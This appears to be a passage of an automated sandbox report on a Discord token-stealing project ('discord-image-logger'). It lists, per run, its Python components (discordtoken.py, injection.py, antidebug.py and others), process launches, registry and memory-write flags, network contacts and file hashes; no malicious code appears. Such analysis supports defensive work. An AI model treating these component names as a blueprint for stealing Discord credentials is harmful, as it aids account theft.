System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 264 wrote to memory of 2716 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 264 wrote to memory of 2716 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 264 wrote to memory of 2716 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2716 wrote to memory of 2864 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2716 wrote to memory of 2864 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2716 wrote to memory of 2864 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2716 wrote to memory of 2864 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | 22e49b9f984b5f8c93f4d9f5a157ec83 |
| SHA1 | dd20a0365bf6f92bf314bb3ec5f2cafd1c71a2bc |
| SHA256 | c9a1398a4e5390c1bc41e6cc1ec2c0bc56a5567e81c9c4e7cd87c799b5456f33 |
| SHA512 | 88b93990a46837759a8a579d1ad59c4ffecc9ff8590bb0eda0a0a61685a9638a2475e42d792e2aea50a559dc66b75045397fe61cdb76b5df885ad66e68cbb897 |
Analysis: behavioral8
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
94s
Max time network
145s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\discordtoken.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
94s
Max time network
129s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\injection.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
92s
Max time network
130s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\startup.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
148s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1479699283-3000499823-2337359760-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\systeminfo.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
91s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2278412438-3475196406-3686434223-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\config.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
Files
Analysis: behavioral17
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win7-20240903-en
Max time kernel
121s
Max time network
127s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3290804112-2823094203-3137964600-1000_Classes\Local Settings | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2196 wrote to memory of 2956 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2196 wrote to memory of 2956 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2196 wrote to memory of 2956 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\rundll32.exe |
| PID 2956 wrote to memory of 2696 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2956 wrote to memory of 2696 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2956 wrote to memory of 2696 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
| PID 2956 wrote to memory of 2696 | N/A | C:\Windows\system32\rundll32.exe | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py
C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe
"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\main.py"
Network
Files
C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents
| MD5 | d13b10193fc5325a324553bd5b2f758f |
| SHA1 | 7cc11c8b658c72cfb37befe8dcdbee47143d24d7 |
| SHA256 | 7d7e519c1b253714a12aff619ab1bce9bc2837e24e3c9c3e20aacd57c55a094e |
| SHA512 | b4442303c79ece053587ec3b37cf8a71567d27f31d7f77660ae6265f88faf99c39c1008a6e26bd81082580870eb3d67bbf43a1dce1e5b38fc4261f896acc0f87 |
Analysis: behavioral4
Detonation Overview
Submitted
2025-02-24 04:13
Reported
2025-02-24 04:15
Platform
win10v2004-20250217-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1294999112-580688058-1763548717-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\discord-image-logger-release\src\components\antidebug.py
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| GB | 2.18.66.169:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | udp |